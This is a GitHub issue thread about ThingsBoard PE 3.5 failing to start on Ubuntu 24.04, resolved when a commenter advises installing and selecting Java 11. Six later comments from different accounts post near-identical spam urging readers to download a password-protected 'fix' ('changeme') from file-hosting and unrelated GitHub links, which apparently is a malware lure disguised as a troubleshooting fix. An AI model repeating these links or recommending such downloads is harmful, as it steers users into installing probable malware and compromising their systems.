### ISSUE TITLE
Thingsboard PE perpetual new Installation doesn't start

### ISSUE THREAD

**Issue by melegazzi** [thingsboard/thingsboard#11292]
**Component**

 * Installation

**Description**
I installed a new machine with Ubuntu 24.04 and did a fresh install of Thingsboard PE 3.5. There were no problems during the installation. When I try to start the Thingsbord service I get this: 

```
sudo service thingsboard status:

thingsboard.service - thingsboard
     Loaded: loaded (/usr/lib/systemd/system/thingsboard.service; enabled; preset: enabled)
     Active: failed (Result: exit-code) since Fri 2024-07-26 13:20:36 UTC; 33min ago
   Duration: 43.943s
    Process: 8985 ExecStart=/usr/share/thingsboard/bin/thingsboard.jar (code=exited, status=1/FAILURE)
   Main PID: 8985 (code=exited, status=1/FAILURE)
        CPU: 1min 23.560s

Jul 26 13:20:31 Nexo-Perpetual thingsboard.jar[9000]:   "whitelabeling" : {
Jul 26 13:20:31 Nexo-Perpetual thingsboard.jar[9000]:     "value" : true,
Jul 26 13:20:31 Nexo-Perpetual thingsboard.jar[9000]:     "description" : "White-labeling feature"
Jul 26 13:20:31 Nexo-Perpetual thingsboard.jar[9000]:   }
Jul 26 13:20:31 Nexo-Perpetual thingsboard.jar[9000]: }
Jul 26 13:20:31 Nexo-Perpetual thingsboard.jar[9000]: Initialized ThingsBoard License Client with instanceId [pBM1ny919vDFyuhXWva0]
Jul 26 13:20:36 Nexo-Perpetual thingsboard.jar[9000]: Stopping ThingsBoard License Client...
Jul 26 13:20:36 Nexo-Perpetual systemd[1]: thingsboard.service: Main process exited, code=exited, status=1/FAILURE
Jul 26 13:20:36 Nexo-Perpetual systemd[1]: thingsboard.service: Failed with result 'exit-code'.
Jul 26 13:20:36 Nexo-Perpetual systemd[1]: thingsboard.service: Consumed 1min 23.560s CPU time, 373.1M memory peak, 0B memory swap peak.
```

Enclosed you can see thingsboard.log
[thingsboard.log](https://github.com/user-attachments/files/16392697/thingsboard.log)

One more thing, I migrate the perpetual license instance from the old Ubuntu machine to the new one and before, I deactivated on the license Server the old license instance.

**Environment**

 * OS:  Ubuntu 24.04 x64
 * ThingsBoard: V3.5

___________________________________________________________
**Disclaimer** 

We appreciate your contribution whether it is a bug report, feature request, or pull request with improvement (hopefully). Please comply with the [Community ethics policy](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies), and do not expect us to answer your requests immediately. Also, do not treat *GitHub issues* as a support channel.

**Comment by pon0marev** [comment]
Make sure you have Java 11 installed and selected.
```
sudo apt update
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java -version
```
Thingsboard lower than version 3.7.0 only runs on Java 11.
Also, please make sure that your thingsboard.yml file is the same as the default one: https://github.com/thingsboard/ThingsboardSupport/blob/main/yml/pe-yml/pe-3.5.0.yml

**Comment by melegazzi** [comment]
Thank you @pon0marev. Now it's working!

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
